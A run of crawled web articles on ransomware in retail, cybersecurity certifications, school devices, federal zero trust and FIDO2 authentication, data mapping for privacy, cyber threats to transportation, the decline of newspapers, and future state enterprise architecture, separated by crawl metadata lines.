Ransomware operators seem to often target retail enterprises because “they are rarely secured well and the benefits are easily monetized.” SonicWall security specialists discovered startling ransomware spikes across retail entities (264%). In July, the Coop Supermarket chain had to close 500 of its stores following the Kaseya ransomware attack.
Ransomware brought extortion to a global scale, and it’s up to all of us, users, business owners, and decision-makers, to disrupt it.
We now know that:
- creating malware or ransomware threats is now a business and it should be treated as such;
- the “lonely hacker in the basement” stereotype died a long time ago;
- the present threat landscape is dominated by well defined and well-funded groups that employ advanced technical tools and social engineering skills to access computer systems and networks;
- even more, cyber criminal groups are hired by large states to target not only financial objectives but political and strategic interests.
We also know that we’re not powerless and there’s a handful of simple things we can do to avoid ransomware. Cybercriminals have as much impact on your data and your security as you give them.
Check this article for more information on how to prevent ransomware.
Heimdal™ Ransomware Encryption Protection
- Blocks any unauthorized encryption attempts;
- Detects ransomware regardless of signature;
- Universal compatibility with any cybersecurity solution;
- Full audit trail with stunning graphics;
|
<urn:uuid:8260ab2b-43cd-4978-9c18-3e2c9daa8d39>
|
CC-MAIN-2022-40
|
https://heimdalsecurity.com/blog/ransomware/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00657.warc.gz
|
en
| 0.936765 | 3,014 | 3.25 | 3 |
By, Guest Contributor: Akshatha Kamath
There was a time when a career in IT was limited to mainframe computers and network support. IT professionals were charged with ensuring technology worked correctly within their organizations so employees could get their jobs done without glitches. Those days seem like ancient history now, as the field of IT has grown to include countless tasks and roles.
Protecting enterprise data and infrastructure has become one of the most critical roles of IT thanks to the rise of cyber attacks. We transmit vast quantities of sensitive data digitally as transactions are made, and we store even more, creating veritable gold mines for hackers who want to steal valuable information, commit denial-of-service attacks, or simply create havoc.
The need for people with cyber security skills is far outpacing the number of qualified applicants, making this a career choice worth considering.
Cyber Security As the New Frontier in IT
Although it has one primary goal—protecting networks, computers, programs, and data from attack, damage and unauthorized access—this field is made up of technologies, processes and practices working together. It is sometimes referred to as information technology security, or IT security because the IT department owns the task of protection and defense.
Cyber security is needed in every domain, from the government to corporate, military to medical, financial to personal, because each one collects, stores and transmits data, much of which is sensitive information. Think back to the Equifax data breach and you’ll realize how far-reaching the effects of a cyber attack can be—the personal information of almost half the population of the United States was compromised during that attack.
As the amount of digital data and transactions grow, so does the need for cyber security professionals in a variety of roles. This has opened the doors to a lucrative career move for both seasoned IT professionals and those making a lateral career move into a new field.
If you’re considering a cyber security certification to either advance or change your career, there are many compelling reasons to do so, including a strong demand in the job market, the pay, the opportunities, and the ease with which you can become qualified.
1. The Demand for Cyber Security Professionals Is Strong
In just the first six months of 2017, there were 918 reported data breaches comprising 1.9 billion data records. That’s 164 percent higher than 2016, and that number does not include data breaches that weren’t reported.
The increase in both data and attacks has created a strong demand for skilled professionals in this domain. It’s predicted that we will need 6 million cyber security professionals by 2019, and we will have 3.5 million unfilled cyber security jobs by 2021. In fact, the number of cyber security jobs is growing three times faster than other tech jobs.
2. Its a Field of Constant Change
3. Doing Good Work While Making Good Money
4. Seek New Opportunities
5. Easy to Move Into This Field
- The CompTIA certification which is a good choice if you’re new to the field. With this certification, you can likely get your foot in the door with a tech support job to start with.
- Certified Ethical Hacker (CEH) certification, which will help you master advanced concepts such as corporate espionage, viruses, and reverse engineering.
- The Certified Information Systems Security Professional (CISSP) certification, the gold standard in the field of information security. This certification will train you to become an information assurance professional who defines all aspects of IT security, including architecture, design, management and controls. Most IT security positions require or prefer a CISSP certification.
- The Certified Information Systems Auditor (CISA) certification will teach you the skill sets you’ll need to govern and control the information technology for a business, as well as how to perform an effective security audit on any organization.
|
<urn:uuid:172e8094-1d43-428e-948c-e69eefcd0910>
|
CC-MAIN-2022-40
|
https://brilliancesecuritymagazine.com/cybersecurity/5-compelling-reasons-to-get-a-cyber-security-certification/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00657.warc.gz
|
en
| 0.948787 | 796 | 2.6875 | 3 |
Devices School Districts Are Using
The vast majority of the school districts we work with agree that 1:1 computing is ideal – not only because it helps meet Common Core Standards but also because it promotes collaboration, incentivizes engagement and gives students access to curriculum throughout the day and at home for homework. When moving to a 1:1 model, districts are faced with a number of device options. So we thought we’d share with you a few examples of what devices K12 Districts are deploying.
- HP Chromebook14: Visalia Unified School District in California uses the Chromebook in an effort to comply with regulation on conducting standardized testing, but they have since integrated these devices for daily use. The Chromebook is very affordable (D&D can provide the device, Google OS management license and theft-preventing engraving) and works off of the Google cloud, making secure use across multiple apps seamlessly simple.
- Samsung Galaxy Tab 4 Education: The Plainfield Public School District in New Jersey was looking for a device that they could use with Discovery Education and Google. Students in grades 6-12 are using these devices. They come to the students pre-installed with apps (the IT department has blocked student download of applications), electronic textbooks, and internet access. Plainfield is primarily using Google Apps for Education.
- Lenovo ThinkPad Yoga 11e Notebook: When Leander Independent School District in Texas started using the ThinkPad, their goal was to equip their students with technological expertise that would give them greater options upon graduation. This touch-screen device allows students to write directly on the screen. It also works with digital probes, which is great in the science classroom. Leander is using Google Apps for Education and Web 2.0 to create presentations and poll students.
If you would like to talk to an expert about which device could best meet your school’s needs, contact D&D Security by calling 800-453-4195 or by clicking here.
|
<urn:uuid:2f61200d-fa79-437c-b4d9-f5fbb37d3095>
|
CC-MAIN-2022-40
|
https://ddsecurity.com/2015/08/13/devices-for-k-12/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00657.warc.gz
|
en
| 0.951135 | 402 | 2.84375 | 3 |
Cybersecurity is one of the pressing issues that the United States is facing. Threats affect the government, organizations, institutions, and even individuals.
The Identity Theft Resource Center (ITRC) said there were 1,291 data breaches publicly reported in the U.S. from January to September 2021, affecting about 281 million individuals. In comparison, this total is 17% more than the recorded breaches during the same period in 2020.
Government Efforts: The Federal Zero Trust Strategy
To address this problem, the government looks for ways to improve cybersecurity. On January 26, 2022, the Federal Zero Trust Strategy was released. The Office of Management and Budget (OMB) published the strategy as Memorandum M-22-09. Moving the U.S. Government Toward Zero Trust Cybersecurity Principles.
This move aims to promote a better security approach through government-wide efforts, setting a new baseline in terms of access controls. An important point to highlight is the prioritization of using phishing-resistant multi-factor authentication (MFA). Additionally, there is also a need to consolidate identity systems for improved protection and monitoring.
Understanding the Strategy
At the core of the strategy are two main focuses — the vision and actions on identity.
Generally, staff members of government agencies have to use enterprise-managed identities to get access to applications used for work. Phishing-resistant multi-factor authentication must be in place to protect said personnel against more sophisticated cyberattacks.
Three actions must be taken.
First, the agencies should have centralized management systems for users.
Second, they should use strong MFA throughout the organization. Specifically, all agency staff members, contractors, and partners have to use phishing-resistant MFA. Meanwhile, public users should be given this option. Furthermore, it should not be required to use special characters for passwords or have regular password rotation.
Third, agencies should consider having at least one device-level signal when giving users authority to access resources. This signal is additional security alongside identity information about the authenticated user.
The FIDO Standard
Through the announcement of the strategy, the federal government also encouraged using FIDO2 standards. Thus, further recognizing the FIDO Alliance’s efforts to promote the use of phishing-resistant multi-factor authentication and reduce people’s over-reliance on passwords.
The FIDO2 is FIDO Alliance’s newest set of specifications. It includes Web Authentication (WebAuthn) specification and Client-to-Authenticator Protocol (CTAP). Learn more about the FIDO2 Project here.
|
<urn:uuid:33661442-6116-40f5-98f6-cb1c57c2e54d>
|
CC-MAIN-2022-40
|
https://noknok.com/mfa-for-cybersecurity-gets-highlighted-in-federal-zero-trust-strategy/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00057.warc.gz
|
en
| 0.921822 | 534 | 2.609375 | 3 |
Part 1 of this series sketches the history of journalism in the U.S. from the pre-Revolutionary era to the present day.
The economy came crashing down in September 2008 as the credit markets seized up, a massive dislocation which is now, tsunami-like, causing huge damage to the economy. This has significantly reduced the amount of credit available for businesses, and has put publishers, consortia and advertisers — many highly leveraged — into a situation that forces them to liquidate parts of their businesses and lay off large numbers of workers just to make the ballooning payments on their bonds.
Many news organizations — made vulnerable by media competition, the rapid drying-up of advertising dollars, fragmenting markets and the Internet — are being forced to close their doors, and it is very likely that many cities’ alternate papers, and in some cases their primary papers, will cease production this year.
The advertising market has collapsed. Automobile manufacturers are now either in or near bankruptcy. Financial services are, of course, in disarray. Real estate is facing its worst markets since the mid-1930s, and luxury goods advertising is disappearing as conspicuous displays of wealth make people targets.
With 5 million jobs lost in the last year and countless others facing reduction in hours or pay, consumer spending has given way to consumer saving. Advertising hasn’t completely disappeared, but its place as the engine driving journalism most certainly has been significantly diminished. In many places, advertising itself is being rethought as the Web continues to become more pervasive in our lives.
The Web’s Devastating Effect
During the 1930s, a number of newspapers that had survived for decades finally succumbed to the ravages of the Great Depression, but once the economy started to recover in the late 1930s and early 1940s — and especially as World War II created an insatiable demand for news — the newspapers in general came back, and many new ones were started, incorporating new technologies in order to be far more competitive.
Eventually, the current crisis will end as well, but it’s likely this time around that newspapers will not recover with the rest of the economy. A big part of the reason for this is the Web — more specifically, the rise of search engines, social media and semantics, known as the “Triple S Threat.” Taken together, these technologies give a significant competitive edge to the newest generation of publishers: everybody.
During the 1990s, as the World Wide Web first began taking shape, designers were torn about which medium the Web was most like. Was it more like a magazine, a newspaper, radio or television? In fact, it was like all of them … and none of them. The Web could mimic the characteristics of other media, from the telegraph and telephone to 3-D worlds. Moreover, it could make it possible to combine these media in ways that no one could have imagined when the first Web browsers appeared. This fluidity of media became the first, most obvious, threat to existing media organizations.
However, the Web proved to be devastating in more subtle and insidious ways. Most Web pages can be thought of as content liberally sprinkled with hyperlinks to other content. These hyperlinks create alternative pathways to content that often bypasses branding (and the corresponding gates), and what’s more, they make the content searchable.
Search engines like Google and Yahoo have changed the dynamics of the Web completely. Instead of locating content on the basis of a brand — in this case, embodied in the server address — they make it possible to find content by using keywords, in ways that frequently render useless the carefully designed front-page portals that companies often spend millions to develop.
Further, search results generally are sorted by relevancy, and freshness plays a big part. Because they search across news sites, the search engines themselves are very quickly fulfilling the timeliness aspect of contemporary journalism.
Everyone’s an Advertiser
This aspect of the collision of journalism and search engines flared recently when the Associated Press threatened to sue aggregators of its news content. Google has a formal aggregation agreement with AP, but Google CEO Eric Schmidt nevertheless warned it — and related organizations — that they risked angering users of news aggregation services at their peril.
The Google chief executive called on the newspaper bosses to engage with readers more thoroughly.
“These are consumer businesses, and if you piss off enough of them you will not have them anymore,” he said. He also condemned many of the newspaper publishers’ Web sites for the poor quality of their technology. “I think the sites are slow, they are slower than reading the paper. That can be worked on, on a technological basis.”
In this context, it’s also worth nothing that Google has very quickly usurped the role of the advertising broker from Madison Avenue. Indeed, in many ways it is better to think of companies such as Google or Yahoo less as search engines and more as advertisers.
Because they control such a critical part of the Web browsing pipeline, they are able to pull together semantic information about users based upon internal profiles, and thus are much better able to target these users at a level that most ad agencies a couple of decades ago would have found impossible to achieve. Not surprisingly, those seeking to advertise are attracted to this — even more so given the comparatively low cost of such advertisements.
Yet there’s another thing tearing away at the advertising firmament. Programs such as AdSense make Web site owners into ad space sellers, even if the Web site in question is a single-person shop operating a blog.
This approach takes advantage of the distributed nature of the Web to make the “long tail” profitable, and it serves to further weaken one of they key benefits that traditional media have had: the ability to sell advertising space in a broadcast fashion.
Kurt Cagle is the managing editor for XMLToday.org.Follow Kurt Cagle on Twitter.
|
<urn:uuid:34137527-e2c3-4478-8ff8-38b915c9f73e>
|
CC-MAIN-2022-40
|
https://www.ecommercetimes.com/story/the-rise-and-fall-of-traditional-journalism-part-2-67094.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00258.warc.gz
|
en
| 0.967486 | 1,228 | 3.265625 | 3 |
Data Mapping | Best Practices to Follow in Data Mapping
What is Data Mapping?
Modern enterprises collect a huge volume of data from a variety of sources and use the data through complex interactions across the organization. The organization can’t analyze, transform, share, and derive valuable insights unless they have a common understanding of the data. Data Mapping is the process of establishing relationships between separate data models to bring a common understanding.
Why Data Mapping?
In this data-driven business environment, companies are collecting data from customers’ mobile devices, websites, and vendors. The collected data is valuable only when we have the right system in place to handle the voluminous and complex data. Data mapping is used to integrate this complex data. A good data map is a necessary component of data management, data governance, data migration, and data integration. Increasingly data mapping has become the starting point for DataGovOps related work.
Data Mapping In the Context of Privacy
With new privacy laws (GDPR, CCPA) and increased customer demand for privacy, companies are required to understand what data they hold and how the data flow inside the organization. By mapping the data, they can comply with privacy laws and implement better privacy controls and protection. Data mapping has become a foundational work, using which organizations can understand what data they collect, process, share, and store.
For instance, GDPR (article 30 and 36) requires organizations to document their processing and conduct periodic data protection impact assessments (DPIA). Without a comprehensive data map, organizations can’t comply with these requirements.
Top 8 Best Practices to Follow in Data Mapping to Achieve Privacy Compliance
1) The Right Approach for Mapping the Data
Data mapping often involves people across the organization. Your approach largely depends on the cost and resources available to the project. Mapping can be implemented across the organizations simultaneously, or you could do one team or one microservice at a time. Companies must involve groups to conduct a high-level overview of their activities to proceed with a comprehensive plan.
2) Identify and Involve Data Stewards/Owners
Mapping can have varying degrees of risk. Identifying the data owner reduces the complexity; hence you must identify the data owners and stewards who represent different parts of the organizations. The particular employee will be responsible for the data within the organization. They bring a wealth of knowledge on the history of the data and context to the data.
3) Pick the Right Tool/Solution
Data mapping is a complex process. The tool used for data mapping has a significant implication on your outcome; hence companies should be careful in selecting the right tool for the job depending upon their existing Infrastructure, volume of data, and goals. With many solutions available in the market, from on-premise tools to open and cloud-based mapping tools, Companies should decide on a system that will help their data strategy. Before choosing the right data mapping tool, think about the following factors:
- Diverse Set of Source Systems – Data mapping tool must handle a variety of data sources. Some tools can handle different data types and sizes without comprising the accuracy while other solutions focus on very high accuracy on a specific type of data/data source. Companies must make sure the selected solution supports the diverse sources that they have in their organization. Plan for the future, identify the tool with a variety of data sources, and support new sources.
- Automation and Scheduling– Automating parts of the data mapping process will save time when you update the map periodically, hence look for solutions that give options to automate without writing or changing the codes. The automation process should be simple, like a drag and drop method, to avoid complexity. Tools that offer process orchestration and scheduling features to automate mapping reduces the workforce and time.
- Track Changes– Good data mapping tools allow users to track the impact of changes as maps are updated. It should also keep a trail of the time and data changes made to a particular data set. This record is beneficial for auditing and compliance purposes.
- Delta Changes – Data mapping tools should allow users to reuse maps, so you don’t have to start from scratch each time. This feature saves time and resources for the organization.
- Personal Data Identification – To growing privacy concerns and regulations, many advanced data mapping software applications allow users to identify and map personal data flow within an organization.
- User Interface – The user interface is an essential factor for the data mapping tool. It should be simple to use for all the employees involved in the process. If you have many data stewards from business with less technical background, you have to pick a tool that caters to the audience.
4) Ensure Data Security
Recently developed data mapping software solutions are equipped with various security features that enable users to secure your database while providing access to data through DPO and analysts. They also allow organizations to conduct a risk analysis of your data.
5) Identify and Map Personal Data
Growing privacy concerns and regulations such as GDPR, CCPA bring new responsibilities for companies in handling personal data. Advanced data mapping software applications allows organizations to identify and map personal data. You could use one of the tools to identify personal data within your company. In addition to the personal mapping data, you must ensure that the data is treated in compliance with privacy laws.
6) Automate the Process
Data inside an organization changes and evolves; hence you have to update the map periodically, looking for options to automate parts of the process. Automating parts of the data mapping process will save time in the long run.
7) Expect Inconsistencies/ Naming conflicts.
Most companies receive data from business partners, such as resellers and suppliers. Mapping and integrating data from third parties can be challenging due to differences in data naming. One partner might name the Customer field as ‘Customer ID’ while another partner might name it as ‘Customer #.’ Your data mapping solution and the process should address the challenge of naming conflicts.
8) Document the Process
Data maps are not a one-time deal. You may have to repeat the process periodically and involve new people to lead the process; hence you must document the process, the steps, findings, and decisions. Moreover, documenting avoid mismatch across the organization. For example, documenting the set of principles to classify data will help maintain a consistent approach across the company.
Why is Data Mapping Important Beyond Privacy?
Data mapping is an integral step in various data management processes, including:
Data mapping is the first step in a range of data integration tasks, including data transformation between the source and destination. A data mapping tool connects the distinct applications and governs how the complex data is handled between them.
Data Migration is the process of selecting, preparing, extracting, and transforming data and permanently transferring it from one IT storage system to another. Using an efficient data mapping solution that can automate the process is vital in migrating data to the destination successfully.
Data Warehousing is the process of creating a connection between the source and target tables. Using a well-defined data mapping model, we can define how data will be structured and stored in the data warehouse.
|
<urn:uuid:dc40e329-c357-4328-859d-a022af85e875>
|
CC-MAIN-2022-40
|
https://www.protecto.ai/data-mapping-best-practices-to-follow-in-data-mapping/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00258.warc.gz
|
en
| 0.904655 | 1,484 | 2.9375 | 3 |
As the transportation sector grows increasingly connected to the internet, it becomes more susceptible to cyberattacks. Failing to protect the industry might induce significant damage to companies and disrupt our lives.
Threat actors continually develop new means to attack critical infrastructure – from healthcare facilities to power utilities – to make a financial gain, exfiltrate information, or cause chaos.
The transportation sector is similar to other critical infrastructure sectors regarding its importance to people's daily lives, like water, power, and telecommunications. People need to move from one place to another; they also need to buy goods and get their cars filled with fuel. The transportation sector provides all these services and more, and failing to protect it from cyberattacks will profoundly impact all other business sectors.
Attackers driven by the thirst for money and chaos
The motivations for cyberattacks against the transportation sector can vary. We can recognize the following causes:
Financial gain. The NotPetya ransomware attack against the giant logistics company Maersk cost more than $300 million of loss due to business interruption in 2017.
Information theft. Threat actors exfiltrate information of, for example, customers and business partners. Ransomware operators are now threatening companies to publish their compromised data on data leak websites if they refuse to pay the ransom. This recently happened with the German giant global logistics firm Hellmann which fell victim to a ransomware attack last December.
Disruption. Malicious actors target organizations to cause chaos and wide disruption in the target country/state. The motivation here could be a direct attack from a foreign country to advance their agenda or caused by terror organizations that aim to cause extensive damage and harm to a large number of citizens for ideological and political gains.
The work of transportation and logistics companies spans over aviation, maritime, and trucking sectors. The dependence on digital technologies to facilitate their work has expanded their attack surfaces and made them more vulnerable to cyber threats.
Aviation industry hit hard
Cyberattacks against airline companies can take different forms and aren’t limited to the airplane operator. Various vendors are involved in providing airplane services, and all are susceptible to cyberattacks, such as airlines, airports, technology vendors, and other contractors and subcontractors responsible for providing ground services.
The primary motivation behind attacking airplane companies is stealing travelers' personal and financial information. The stolen data can be used to commit fraud or sold to interested parties in the darknet marketplace. The aviation industry is prosperous and very time-sensitive. It also needs a series of interconnected services to function properly. This fact made attackers more willing to attack this sector, especially deploy ransomware, because of the high impact of any service interruption. The affected company is likely to pay the ransom quickly to restore its normal operations and avoid the considerable interruption losses.
The cyberattack against the low-cost British airline company EasyJet is a prominent example of the severe consequences of cyberattacks on airline companies. In 2020, the company was hit by a cyberattack that compromised the personal and financial information of 9 million of its customers. The impacted travelers raised more than 10,000 lawsuits from 50 countries worldwide; this attack caused the company to lose 45% of its share value.
Attacks again maritime disrupt supply chains
The maritime sector includes vessels, shipbuilders, ports, ground services, technology providers, and all other vendors in the supply chain. All these parties utilize digital technologies to facilitate their work and interact with each other. Attacking maritime transportation will heavily impact the global supply chain of goods.
Maritime transportation is not only critical for moving goods; for instance, most of the world's petroleum and other liquid energy supplies are carried through the sea. Disrupting moving power supplies through maritime trade will have disastrous consequences on the global economy because it will impact all other sectors.
The increased adoption of digital technologies across all industries has encouraged shipping companies to ride the wave and see how they benefit from automation.
Shipping companies are now using different hardware and software technologies to enhance work efficiencies in data analysis, the Internet of Things (IoT), and operational technology (OT) areas.
Cyberattacks against the maritime industry are similar to those targeting critical infrastructure. The most used attack vectors remain social engineering and ransomware. Some attacks aim to cause disruption, such as DDoS attacks against Global Positioning System (GPS) and Automatic Identification System (AIS). In contrast, others target shipping digital communications, route management solutions, and Integrated Control Systems (ICS) used to monitor the complex components that make up every vessel.
Sharp increase in attacks against ground transportation
The trucking sector uses digital technologies to enhance efficiency, beginning with autonomous vehicles, tracking solutions, cloud technologies for administrative works and running apps (SaaS and IaaS), IoT sensors in trucks, and ending with route management.
Ground transportation companies generally do not take cybersecurity threats seriously because they think they are not lucrative targets for threat actors; however, this is inaccurate. According to Attrix president Anthony Mainville, ransomware attacks increased by 80% in 2020, and the annual growth of such attacks in transportation reached 186% in June 2021.
The recent attack against the Minnesota trucking and logistics company Bay & Bay, which happened for the second time (the first ransomware attack occurred in 2018), shows that even prepared companies who suffered from a significant cyber incident in the past still fall victim again to the same threat type, despite the enhanced security tools, systems, and processes.
Common attack vectors
Like other high-profit sectors, transportation and logistics companies suffer from many cyber threats. The following list is the most common one.
Phishing emails. Intruders impersonate a legitimate entity (e.g., a bank or a legitimate third-party provider) and communicate via email, SMS, phone calls, or even in person. They use different psychological tactics to convince target individuals to give them sensitive information, such as login credentials. There are different types of phishing, such as spear-phishing (targeted attack) and spear-phishing attachment (which attach malware with email messages to gain an entry point to the target IT environment using the compromised endpoint device.
Ransomware. This is the greatest threat targeting all organization types worldwide. Ransomware works by encrypting target company IT systems files and demanding a ransom to remove the restriction. The profitable model of ransomware has encouraged organized-criminal groups to utilize this attack vector heavily to target transportation companies.
Exploiting the remote-working model. After the COVID19 pandemic, companies have shifted many job roles to fully remote. Employees' devices are less secure than those used in the working environment and are easier to infiltrate by threat actors.
Responding to cyberattacks
Today's IT environments are complex and span over on-premise and cloud. To detect advanced cyber threats and unknown malware, installing a Network Detection and Response (NDR) solution is critical to monitor all digital interactions in the organization's digital ecosystem.
Secure endpoint and IoT devices. Installing antivirus and personal firewalls on all endpoint devices (workstations, laptops, tablets, and smartphones) is critical. Most IoT devices can not be protected using the traditional way. Your company needs to develop a strict approach to assess the security of all IoT devices used in its environment and suggest the best tools and security controls to protect each device.
Network segmentation. Dividing a network physically through switches and routers or virtually through VLAN is a good security practice to prevent cyber threats from spreading to all network segments at once. It also allows the security team to install specific security controls on each segment, according to its importance and the type of data and apps it holds.
Patch management. Any devices that access your enterprise IT environment should be appropriately patched. This includes keeping operating systems and all installed apps up to date. This prevents threat actors from exploiting security vulnerabilities to gain a foothold in the target environment.
Backup regularly. Ensure you have a complete backup of all work data. This allows you to restore operations quickly in the case of a ransomware attack.
Cybersecurity awareness training. This is the most important protective measure against all cyber threats. Regardless of the security solutions installed, a single error by an unaware employee can result in installing ransomware in your environment and will make all your protective measures useless.
|
<urn:uuid:180fe2d0-eda7-4b49-878d-25f9a15163f3>
|
CC-MAIN-2022-40
|
https://cybernews.com/security/failing-to-protect-transportation-systems-may-profoundly-hurt-business/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00258.warc.gz
|
en
| 0.933988 | 1,686 | 2.65625 | 3 |
Future state architecture refers to the development of a proactive technology roadmap designed to future-proof an organization’s IT infrastructure against the unforeseeable challenges which shifting commercial changes and technological developments will demand on enterprise architecture. It sets enterprise architecture accomplishments against a timeline that shows how enterprise architecture will be developed to push the organization toward IT transformation.
While evolution is a constant within the world of network IT and communications software, the exact nature of this change is unknowable. In order for it to be successful and serve the business, nonprofit, or government agency at hand, enterprise architecture must align with the organization’s contemporary and future requirements.
Rather than investing in technology for its own sake, future state architecture is about serving the business with a robustness and flexibility which will allow for long-term dynamism. Built into this model is the idea that future capabilities and requirements cannot be fully known, so the architecture must be flexible enough that applications and functionalities can be incorporated in the future.
As digital transformation initiatives pick up speed and next-gen technologies like artificial intelligence, 5G, and Internet of Things take hold, the future is becoming increasingly unpredictable. It has never been harder for enterprises to anticipate what will be required from their networks in the next few years, which is what makes effective future state architecture so critical today.
Defining Future State Architecture
When the decision is made to implement a new IT system, enterprise architects must avoid replicating the previous system. Often, this system has been patched together into a chaotic “hairball” of dated applications using painstakingly bespoke engineering solutions.
Although they cannot predict the future with 100% accuracy, enterprise architects can be confident that certain requirements will be placed on the system. The architect’s job is to create a system that can adapt to these requirements.
As well as robustness, a degree of flexibility has to be built into the new enterprise architecture. Not only does it need to be capable of meeting certain demands, outside of the current paradigm of information technology expectation, but also it must allow for innovation in the future.
If future users and engineers are unable to add future functionalities, the new enterprise architecture will quickly become beset with the same problems as the legacy system. This is a costly and inefficient cycle.
Future state architecture refers to the practice of pragmatically building open-ended and versatile functionalities, based on known business needs and future goals, into enterprise architecture. Future state architecture best practices help organizations to avoid creating a system that can become unable to maintain its purpose in the future.
Cost, Security, Flexibility: Three Competing Requirements
Because enterprise architecture is often brought in to replace an outdated and even chaotic system of incompatible applications, a lot of enterprise architecture is developed on the basis of correcting the problems of the previous system.
Three distinct requirements begin to emerge and may appear to be incompatible:
- The architecture must be secure.
- The architecture must be flexible.
- The architecture must be affordable.
An architecture which places a high emphasis on security can struggle to be suitably flexible and be developed at a low cost, for instance. Alternatively, a system which prioritizes flexibility may have increased ease of adoption for new functions and capabilities, but it struggles to keep pace with security needs. A focus on keeping the project within a restrictive budget may compromise both security and agility.
As a result, the various requirements expected from enterprise architecture must be balanced against one another, creating a strong, budget-appropriate, and agile system. For future state architecture, these competing requirements must be anticipated in the system’s functionalities for future growth as well.
While technological breakthroughs are pushing the business ecosystem to become increasingly sophisticated and companies are required to change themselves to adapt to fresh challenges and realities, the non-commercial applications of future state architecture are diverse.
Every business has many parts, which may include:
- Products and/or services
These elements have to work together seamlessly in order to create value, leading the customer to buy whatever the company is selling and the company to be profitable.
It is worth noting that the term “enterprise” is not intended to indicate only for-profit endeavors, but rather organizations in general, to include:
- Government agencies
- Military branches
In spite of their differences, there is a lot of overlap between what each type of entity requires from their enterprise architecture.
Case Study: Sentient Digital’s Military Sealift Command Contract
In 2019, Sentient Digital, then operating as Entrust Government Solutions, was awarded a $49 million contract to provide information technology engineering support to the Military Sealift Command (MSC).
The MSC is the division of the U.S. Navy that controls military ocean transport ships and whose duties include replenishment of Navy ships as well as transporting cargo and supplies, among other critical missions. Sentient Digital was tasked with helping MSC to modernize command, control, communications, and computers (“C4”) systems.
Sentient Digital will also support the development of governance measures to ensure the MSC’s IT platforms align with its N6 division’s strategic business support plan, architecture frameworks, and technical standards established by the Department of Defense and Department of the Navy.
The contract requires Sentient Digital to conduct analysis and create an IT investment roadmap for development of MSC’s future state architecture, which as noted above is a critical supportive program providing auxiliary services to the U.S. Navy, including its warfighters.
Sentient Digital’s approach to future state architecture began with a comprehensive current state evaluation of MSC’s architecture, comprising:
- MSC current system capabilities review against joint capability areas
- MSC systems requirements review against N6 capabilities
- IT investment plans review
- Gap analysis of current and future capability sets
This is ultimately leading to identification of IT investment opportunities based upon gap analysis and the creation of a roadmap for future state enterprise architecture for the MSC’s N6 initiative.
Enterprise Architecture Objectives in the Military and Private Sectors
The most immediately significant difference between commercial IT infrastructure and its military counterpart is the primary objective of each.
While a military contract is an opportunity for streamlined cost efficiencies and economic benefits, ultimately the deliverable is enhanced security to the lives and wellbeing of the warfighters. When technology is supporting warfighters, the end user is often in a hostile and unfamiliar environment, with limited or zero pre-existing infrastructure. The warfighter may have:
- Surveillance equipment
- Local and long-range communications devices
- Scanning systems
If the warfighter is at sea, for example, their vessel is likely to require the following systems:
- Communications (military, commercial, IP services)
- HR management
- Navigation systems
- Engineering systems
- Complex weapons systems
- Sophisticated resource and supply chain analytics
- Medical devices
The enterprise architecture must deliver a system which allows these diverse applications to be compatible. Failure will lead to a patchwork of inefficient systems and a greater demand on time, expertise, and resources dedicated to creating application flows. Ultimately it is the warfighter who would suffer, left with less than optimal communications, surveillance, and weapons systems.
Enterprise Architecture on Land and at Sea: Military and Civilian Applications
There is a substantial overlap between military requirements from enterprise architecture and more quotidian private sector requirements. Civilian resource extraction professionals working in the field have similar systems and devices to military personnel, for example. They also often work in sub-zero or tropical conditions or in marine environments.
The requirements for strong enterprise architecture are broadly similar. From extracting core samples to assessing the damage in the aftermath of a disaster, an organization with time-sensitive, high-stakes field-based operations needs to be confident that the data they capture can be sent to a different element of the organization in a form that can be processed.
This is true of:
- The disaster response industry
- Search and rescue teams
- Oil and gas exploration/extraction
- Law enforcement and firefighting
- Elements of construction and engineering
Furthermore, despite the assumed equivalence between military applications and “life or death” stakes while the private sector is expected to be more concerned with business figures, resource extraction and disaster response work are both industries with a serious and sustained threat to life.
Enterprise Architecture on Land and at Sea: Cultural Attitudes
Sentient Digital is a veteran-owned and operated company which provides technology solutions to federal, defense, and commercial clients using multiple delivery models. As a company with an agile mindset focused on meeting client objectives through cloud, cybersecurity, software development, and systems integration, Sentient Digital is experienced in government, military, and for-profit decision-making processes.
As technology advances, the challenges faced by contemporary business include:
- Competition from both disrupters and legacy companies
- International challenges
- Increased customer expectations
- Emergence of new business models
- Rapidly shifting regulatory landscape
Each of these threats represents an existential challenge to the contemporary business, which can only function so long as it successfully creates value for the customer. For Military Sealift Command specifically, and the military generally, a decline in operational power, organizational efficiency, and technological dominance could lead to a loss of military supremacy.
When it comes to future state architecture, the cultures within the contemporary business and within the military reflect an awareness of these critical threats.
Sentient Digital’s Work on the MSC Systems
Members of Sentient Digital’s team have undertaken the mapping of MSC’s current state enterprise architecture in comparison with the Department of Defense’s joint capabilities and functions lists. Looking at current state enterprise architecture enables us to undertake analysis geared towards assessing MSC’s ability to complete their missions in contested environments. Potential capability solutions can be either process changes or material changes.
Various N6 personnel have also been consulted in the architecture review sessions, providing the opportunity for input to and awareness of imminent developments to MSC architecture. Ultimately, the objective is the construction and implementation of an IT investment roadmap which will lead to the transformation required to meet future capabilities.
Supporting the warfighter in high-stakes situations is the reason for the project, as the main objective of MSC, and our use of future state architecture best practices will facilitate this goal. A robust and flexible future state enterprise architecture will allow the Department of Defense to remain equipped to deliver on its portfolio. With a comprehensive overhaul, MSC will be able to continue its work supporting warfighters regardless of future developments.
Get in Touch Today About Future State Enterprise Architecture
While many of the systems, processes, and technologies which Sentient Digital provides to MSC and other government agencies are proprietary and classified, parties interested in careers with SDi or becoming a client are encouraged to reach out to us to learn more.
Sentient Digital is proud to be veteran-owned and operated, and we look forward to helping more government and commercial clients with their enterprise architecture.
|
